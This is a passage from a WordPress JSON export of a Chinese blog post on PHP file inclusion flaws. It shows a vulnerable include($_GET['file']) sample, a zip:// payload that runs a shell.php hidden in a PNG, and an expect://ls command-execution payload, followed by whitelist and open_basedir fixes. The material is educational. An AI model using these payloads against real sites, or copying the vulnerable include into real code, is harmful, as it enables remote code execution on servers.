\u65f6\uff0cPHP\u914d\u7f6e\u6587\u4ef6\u9700\u8981\u5f00\u542fallow_url_fopen\u548callow_url_include\uff0c\u5e76\u4e14PHP\u7248\u672c\u8981\u9ad8\u4e8e5.3.0<\/strong><\/p>\n<blockquote>\n<p>\u6ce8\u610f\uff1a\u9700\u8981\u5c06#\u8f6c\u6362\u6210URL\u7f16\u7801\uff1a%23<\/p>\n<\/blockquote>\n<p>\u4ee3\u7801\u793a\u4f8b\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include($file);\n?&gt;<\/code><\/pre>\n<p>\u8f93\u5165\u6d4b\u8bd5\uff1a<code>http:\/\/www.abc.com\/xxx\/file?file=zip:\/\/D:\/phpstudy\/www\/...\/test.png%23shell.php (zip\u5fc5\u987b\u662f\u7edd\u5bf9\u8def\u5f84)<\/code><br \/>\n\u8fd9\u6837zip:\/\/\u5c31\u4f1a\u5c06png\u5f53\u505azip\u538b\u7f29\u5305\u8fdb\u884c\u89e3\u538b\uff0c\u5e76\u4e14\u8bbf\u95ee\u89e3\u538b\u540e\u7684shell.php\u6587\u4ef6<\/p>\n<h2>expect:\/\/\u4f2a\u534f\u8bae<\/h2>\n<p>expect:\/\/\u4f2a\u534f\u8bae\u7528\u6765\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u4f46\u662f\u9700\u8981\u5b89\u88c5\u62d3\u5c55<br \/>\n\u7528\u6cd5: <code>?file=expect:\/\/ls<\/code><\/p>\n<h1>\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u4fee\u590d<\/h1>\n<h2>\u4ee3\u7801\u914d\u7f6e<\/h2>\n<p>\u53ef\u4ee5\u5728\u4ee3\u7801\u5c42\u5bf9\u6587\u4ef6\u5305\u542b\u8fdb\u884c\u8fc7\u6ee4\uff0c\u8bbe\u7f6e\u5305\u542b\u7684\u53c2\u6570\u7684\u767d\u540d\u5355\uff0c\u5047\u8bbe\u7f51\u7ad9\u53ea\u5305\u542b\u6587\u4ef6\u4e3aindex.php\u548cadmin.php<br \/>\n\u5c31\u53ef\u4ee5\u5b9a\u4e49\u597d\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $filename=$_GET[&#039;filename&#039;];\n    switch ($filename) {\n        case &#039;index&#039;:\n        case &#039;admin&#039;:\n            include(&#039;\/var\/www\/html\/&#039;.$filename.&#039;.php&#039;);\n            break;\n        default:\n            break;\n    
}\n?&gt;<\/code><\/pre>\n<h2>\u670d\u52a1\u5668\u914d\u7f6e<\/h2>\n<ul>\n<li>\u4fee\u6539PHP\u914d\u7f6e\u6587\u4ef6\uff0c\u5c06open_basedir\u7684\u503c\u8bbe\u7f6e\u4e3a\u53ef\u4ee5\u5305\u542b\u7684\u7279\u5b9a\u76ee\u5f55\uff0c\u540e\u9762\u8981\u52a0\/\uff0c\u4f8b\u5982open_basedir=\/var\/www\/html\/<\/li>\n<li>\u4fee\u6539PHP\u914d\u7f6e\u6587\u4ef6\uff0c\u5173\u95edallow_url_include\uff1b\u6ce8\u610f\u8fd9\u53ea\u80fd\u963b\u6b62\u8fdc\u7a0b\u5305\u542b\u4ee5\u53caphp:\/\/input\u3001data:\/\/\u7b49\u4f2a\u534f\u8bae\uff0c\u5bf9php:\/\/filter\u3001file:\/\/\u548c\u76ee\u5f55\u7a7f\u8d8a\u65e0\u6548\uff0c\u56e0\u6b64\u4ee3\u7801\u5c42\u7684\u767d\u540d\u5355\u4ecd\u662f\u4e3b\u8981\u9632\u62a4<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>\u6587\u4ef6\u5305\u542b\u7684\u5b9a\u4e49 \u5982\u679c\u6587\u4ef6\u5305\u542b\u51fd\u6570\u6ca1\u6709\u7ecf\u8fc7\u4e25\u683c\u7684\u8fc7\u6ee4\u6216\u8005\u5b9a\u4e49 \u5e76\u4e14\u53c2\u6570\u53ef\u4ee5\u88ab\u7528\u6237\u63a7\u5236 \u8fd9\u6837\u5c31\u6709\u53ef\u80fd\u5305\u542b\u975e\u9884\u671f\u7684\u6587\u4ef6\u3002 \u5982\u679c\u6587\u4ef6\u4e2d\u5b58\u5728 &#8230;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-123","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/123","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=123"}],"version-history":[{"count":2,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/123\/revisions"}],"predecessor-version":[{"id":233,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/123\/revisions\/233"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=123"}],"wp:term"
:[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=123"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=123"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}